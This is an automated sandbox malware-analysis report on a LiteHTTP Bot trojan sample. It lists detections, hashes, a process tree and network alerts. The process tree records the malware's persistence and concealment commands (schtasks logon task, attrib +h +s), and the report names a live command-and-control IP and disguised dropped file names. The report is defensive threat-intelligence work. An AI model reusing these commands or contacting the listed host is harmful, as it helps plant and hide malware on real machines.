Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3u8A2xjbBT.exe

Overview

General Information

Sample name:3u8A2xjbBT.exe
renamed because original name is a hash value
Original sample name:8391d3b5332c4b1164333ddce388a8c7.exe
Analysis ID:1545318
MD5:8391d3b5332c4b1164333ddce388a8c7
SHA1:b982fc92ed38565debf033b0ffaa2181a8caa5e7
SHA256:e201e9a5c9fd3a68f54e2ada061a242df3ed813e56d2b09e2c8efc04953c2f72
Tags:32exetrojan
Infos:

Detection

LiteHTTP Bot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LiteHTTP Bot
.NET source code contains potential unpacker
AI detected suspicious sample
Found strings related to Crypto-Mining
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 3u8A2xjbBT.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 8391D3B5332C4B1164333DDCE388A8C7)
    • schtasks.exe (PID: 1888 cmdline: "schtasks" /Query /TN "3u8A2xjbBT" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2184 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "3u8A2xjbBT" /tr "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2028 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2156 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5392 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5828 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7152 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 3896 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 4944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2032 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 3164 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 6624 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5716 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • 3u8A2xjbBT.exe (PID: 2908 cmdline: C:\Users\user\Desktop\3u8A2xjbBT.exe MD5: 8391D3B5332C4B1164333DDCE388A8C7)
    • schtasks.exe (PID: 4136 cmdline: "schtasks" /Query /TN "3u8A2xjbBT" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5432 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5936 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • 3u8A2xjbBT.exe (PID: 4704 cmdline: "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 8391D3B5332C4B1164333DDCE388A8C7)
    • schtasks.exe (PID: 1200 cmdline: "schtasks" /Query /TN "3u8A2xjbBT" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 3576 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 6644 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7136 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5980 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 368 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2392 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2532 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
3u8A2xjbBT.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\OneDrive\microsoft.net.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        C:\Users\user\OneDrive\windows nt.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\OneDrive\java.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            C:\Users\user\OneDrive\windowspowershell.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              C:\Users\user\OneDrive\google.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                Click to see the 18 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
                  00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
                    0000000F.00000002.3711404452.0000000002D3A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
                      0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
                        00000000.00000002.3711597312.0000000003536000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
                          Click to see the 20 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          16.2.3u8A2xjbBT.exe.3039c04.0.raw.unpackJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security

                            Sigma Signatures

                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\3u8A2xjbBT.exe, ProcessId: 6464, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3u8A2xjbBT.lnk

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-30T12:23:15.081287+010028299091Malware Command and Control Activity Detected192.168.2.74997587.120.126.580TCP
                            2024-10-30T12:23:39.251162+010028299091Malware Command and Control Activity Detected192.168.2.74997687.120.126.580TCP
                            2024-10-30T12:23:54.521460+010028299091Malware Command and Control Activity Detected192.168.2.74997787.120.126.580TCP
                            2024-10-30T12:24:00.190004+010028299091Malware Command and Control Activity Detected192.168.2.74997887.120.126.580TCP
                            2024-10-30T12:24:03.486759+010028299091Malware Command and Control Activity Detected192.168.2.74997987.120.126.580TCP
                            2024-10-30T12:24:10.200258+010028299091Malware Command and Control Activity Detected192.168.2.74998087.120.126.580TCP
                            2024-10-30T12:24:15.603728+010028299091Malware Command and Control Activity Detected192.168.2.74998187.120.126.580TCP
                            2024-10-30T12:24:17.950436+010028299091Malware Command and Control Activity Detected192.168.2.74998287.120.126.580TCP
                            2024-10-30T12:24:21.045117+010028299091Malware Command and Control Activity Detected192.168.2.74998387.120.126.580TCP
                            2024-10-30T12:24:26.317282+010028299091Malware Command and Control Activity Detected192.168.2.74998487.120.126.580TCP
                            2024-10-30T12:24:29.796910+010028299091Malware Command and Control Activity Detected192.168.2.74998587.120.126.580TCP
                            2024-10-30T12:24:42.147037+010028299091Malware Command and Control Activity Detected192.168.2.74998687.120.126.580TCP
                            2024-10-30T12:24:57.056047+010028299091Malware Command and Control Activity Detected192.168.2.74998787.120.126.580TCP
                            2024-10-30T12:24:58.222260+010028299091Malware Command and Control Activity Detected192.168.2.74998887.120.126.580TCP
                            2024-10-30T12:25:10.614517+010028299091Malware Command and Control Activity Detected192.168.2.74998987.120.126.580TCP
                            2024-10-30T12:25:10.962118+010028299091Malware Command and Control Activity Detected192.168.2.74999087.120.126.580TCP
                            2024-10-30T12:25:18.093468+010028299091Malware Command and Control Activity Detected192.168.2.74999187.120.126.580TCP
                            2024-10-30T12:25:20.331614+010028299091Malware Command and Control Activity Detected192.168.2.74999287.120.126.580TCP
                            2024-10-30T12:25:34.013526+010028299091Malware Command and Control Activity Detected192.168.2.74999387.120.126.580TCP
                            2024-10-30T12:25:37.547049+010028299091Malware Command and Control Activity Detected192.168.2.74999487.120.126.580TCP
                            2024-10-30T12:25:49.828720+010028299091Malware Command and Control Activity Detected192.168.2.74999587.120.126.580TCP
                            2024-10-30T12:25:53.892869+010028299091Malware Command and Control Activity Detected192.168.2.74999687.120.126.580TCP
                            2024-10-30T12:25:53.961069+010028299091Malware Command and Control Activity Detected192.168.2.74999787.120.126.580TCP
                            2024-10-30T12:26:01.097855+010028299091Malware Command and Control Activity Detected192.168.2.74999887.120.126.580TCP
                            2024-10-30T12:26:14.651363+010028299091Malware Command and Control Activity Detected192.168.2.74999987.120.126.580TCP
                            2024-10-30T12:26:19.087674+010028299091Malware Command and Control Activity Detected192.168.2.75000087.120.126.580TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-30T12:23:15.081287+010028197051Malware Command and Control Activity Detected192.168.2.74997587.120.126.580TCP
                            2024-10-30T12:23:39.251162+010028197051Malware Command and Control Activity Detected192.168.2.74997687.120.126.580TCP
                            2024-10-30T12:23:54.521460+010028197051Malware Command and Control Activity Detected192.168.2.74997787.120.126.580TCP
                            2024-10-30T12:24:00.190004+010028197051Malware Command and Control Activity Detected192.168.2.74997887.120.126.580TCP
                            2024-10-30T12:24:03.486759+010028197051Malware Command and Control Activity Detected192.168.2.74997987.120.126.580TCP
                            2024-10-30T12:24:10.200258+010028197051Malware Command and Control Activity Detected192.168.2.74998087.120.126.580TCP
                            2024-10-30T12:24:15.603728+010028197051Malware Command and Control Activity Detected192.168.2.74998187.120.126.580TCP
                            2024-10-30T12:24:17.950436+010028197051Malware Command and Control Activity Detected192.168.2.74998287.120.126.580TCP
                            2024-10-30T12:24:21.045117+010028197051Malware Command and Control Activity Detected192.168.2.74998387.120.126.580TCP
                            2024-10-30T12:24:26.317282+010028197051Malware Command and Control Activity Detected192.168.2.74998487.120.126.580TCP
                            2024-10-30T12:24:29.796910+010028197051Malware Command and Control Activity Detected192.168.2.74998587.120.126.580TCP
                            2024-10-30T12:24:42.147037+010028197051Malware Command and Control Activity Detected192.168.2.74998687.120.126.580TCP
                            2024-10-30T12:24:57.056047+010028197051Malware Command and Control Activity Detected192.168.2.74998787.120.126.580TCP
                            2024-10-30T12:24:58.222260+010028197051Malware Command and Control Activity Detected192.168.2.74998887.120.126.580TCP
                            2024-10-30T12:25:10.614517+010028197051Malware Command and Control Activity Detected192.168.2.74998987.120.126.580TCP
                            2024-10-30T12:25:10.962118+010028197051Malware Command and Control Activity Detected192.168.2.74999087.120.126.580TCP
                            2024-10-30T12:25:18.093468+010028197051Malware Command and Control Activity Detected192.168.2.74999187.120.126.580TCP
                            2024-10-30T12:25:20.331614+010028197051Malware Command and Control Activity Detected192.168.2.74999287.120.126.580TCP
                            2024-10-30T12:25:34.013526+010028197051Malware Command and Control Activity Detected192.168.2.74999387.120.126.580TCP
                            2024-10-30T12:25:37.547049+010028197051Malware Command and Control Activity Detected192.168.2.74999487.120.126.580TCP
                            2024-10-30T12:25:49.828720+010028197051Malware Command and Control Activity Detected192.168.2.74999587.120.126.580TCP
                            2024-10-30T12:25:53.892869+010028197051Malware Command and Control Activity Detected192.168.2.74999687.120.126.580TCP
                            2024-10-30T12:25:53.961069+010028197051Malware Command and Control Activity Detected192.168.2.74999787.120.126.580TCP
                            2024-10-30T12:26:01.097855+010028197051Malware Command and Control Activity Detected192.168.2.74999887.120.126.580TCP
                            2024-10-30T12:26:14.651363+010028197051Malware Command and Control Activity Detected192.168.2.74999987.120.126.580TCP
                            2024-10-30T12:26:19.087674+010028197051Malware Command and Control Activity Detected192.168.2.75000087.120.126.580TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-30T12:23:14.597901+010028302381A Network Trojan was detected192.168.2.74997587.120.126.580TCP
                            2024-10-30T12:23:38.754593+010028302381A Network Trojan was detected192.168.2.74997687.120.126.580TCP
                            2024-10-30T12:23:54.035524+010028302381A Network Trojan was detected192.168.2.74997787.120.126.580TCP
                            2024-10-30T12:23:59.675540+010028302381A Network Trojan was detected192.168.2.74997887.120.126.580TCP
                            2024-10-30T12:24:03.014359+010028302381A Network Trojan was detected192.168.2.74997987.120.126.580TCP
                            2024-10-30T12:24:09.706769+010028302381A Network Trojan was detected192.168.2.74998087.120.126.580TCP
                            2024-10-30T12:24:15.115758+010028302381A Network Trojan was detected192.168.2.74998187.120.126.580TCP
                            2024-10-30T12:24:17.472443+010028302381A Network Trojan was detected192.168.2.74998287.120.126.580TCP
                            2024-10-30T12:24:20.567020+010028302381A Network Trojan was detected192.168.2.74998387.120.126.580TCP
                            2024-10-30T12:24:25.847443+010028302381A Network Trojan was detected192.168.2.74998487.120.126.580TCP
                            2024-10-30T12:24:29.322052+010028302381A Network Trojan was detected192.168.2.74998587.120.126.580TCP
                            2024-10-30T12:24:41.675648+010028302381A Network Trojan was detected192.168.2.74998687.120.126.580TCP
                            2024-10-30T12:24:56.410071+010028302381A Network Trojan was detected192.168.2.74998787.120.126.580TCP
                            2024-10-30T12:24:57.707786+010028302381A Network Trojan was detected192.168.2.74998887.120.126.580TCP
                            2024-10-30T12:25:10.113371+010028302381A Network Trojan was detected192.168.2.74998987.120.126.580TCP
                            2024-10-30T12:25:10.457150+010028302381A Network Trojan was detected192.168.2.74999087.120.126.580TCP
                            2024-10-30T12:25:17.613322+010028302381A Network Trojan was detected192.168.2.74999187.120.126.580TCP
                            2024-10-30T12:25:19.847638+010028302381A Network Trojan was detected192.168.2.74999287.120.126.580TCP
                            2024-10-30T12:25:33.535198+010028302381A Network Trojan was detected192.168.2.74999387.120.126.580TCP
                            2024-10-30T12:25:37.035238+010028302381A Network Trojan was detected192.168.2.74999487.120.126.580TCP
                            2024-10-30T12:25:49.316513+010028302381A Network Trojan was detected192.168.2.74999587.120.126.580TCP
                            2024-10-30T12:25:53.426019+010028302381A Network Trojan was detected192.168.2.74999687.120.126.580TCP
                            2024-10-30T12:25:53.473267+010028302381A Network Trojan was detected192.168.2.74999787.120.126.580TCP
                            2024-10-30T12:26:00.633144+010028302381A Network Trojan was detected192.168.2.74999887.120.126.580TCP
                            2024-10-30T12:26:14.160383+010028302381A Network Trojan was detected192.168.2.74999987.120.126.580TCP
                            2024-10-30T12:26:18.597880+010028302381A Network Trojan was detected192.168.2.75000087.120.126.580TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: 3u8A2xjbBT.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Users\user\OneDrive\msbuild.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\mozilla maintenance service.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\jdownloader.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\msecache.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\google.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\windows mail.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\common files.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\java.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\windows defender.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\microsoft.net.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\microsoft.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\reference assemblies.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\microsoft office.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\internet explorer.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Source: C:\Users\user\OneDrive\autoit3.exeAvira: detection malicious, Label: DR/AVI.Agent.mrstb
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\OneDrive\autoit3.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\common files.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\google.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\internet explorer.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\java.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\jdownloader.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\microsoft office.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\microsoft.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\microsoft.net.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\mozilla maintenance service.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\msbuild.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\msecache.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\reference assemblies.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\windows defender.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\windows mail.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\windows media player.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\windows multimedia platform.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\windows nt.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\windows photo viewer.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\windows portable devices.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\windows sidebar.exeReversingLabs: Detection: 67%
                            Source: C:\Users\user\OneDrive\windowspowershell.exeReversingLabs: Detection: 67%
                            Multi AV Scanner detection for submitted file
                            Source: 3u8A2xjbBT.exeReversingLabs: Detection: 67%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\OneDrive\msbuild.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\mozilla maintenance service.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\jdownloader.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\msecache.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\google.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\windows mail.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\common files.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\java.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\windows defender.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\microsoft.net.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\microsoft.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\reference assemblies.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\microsoft office.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\internet explorer.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\OneDrive\autoit3.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: 3u8A2xjbBT.exeJoe Sandbox ML: detected

                            Bitcoin Miner

                            barindex
                            Found strings related to Crypto-Mining
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3711597312.00000000033B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: CryptoNight
                            Source: 3u8A2xjbBT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 3u8A2xjbBT.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_0166ADF4
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_0166AE00
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h15_2_02A1AE00
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h15_2_02A1ADF4
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h16_2_0182ADF4
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h16_2_0182AE00

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49982 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49985 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49994 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49988 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49992 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49989 -> 87.120.126.5:80
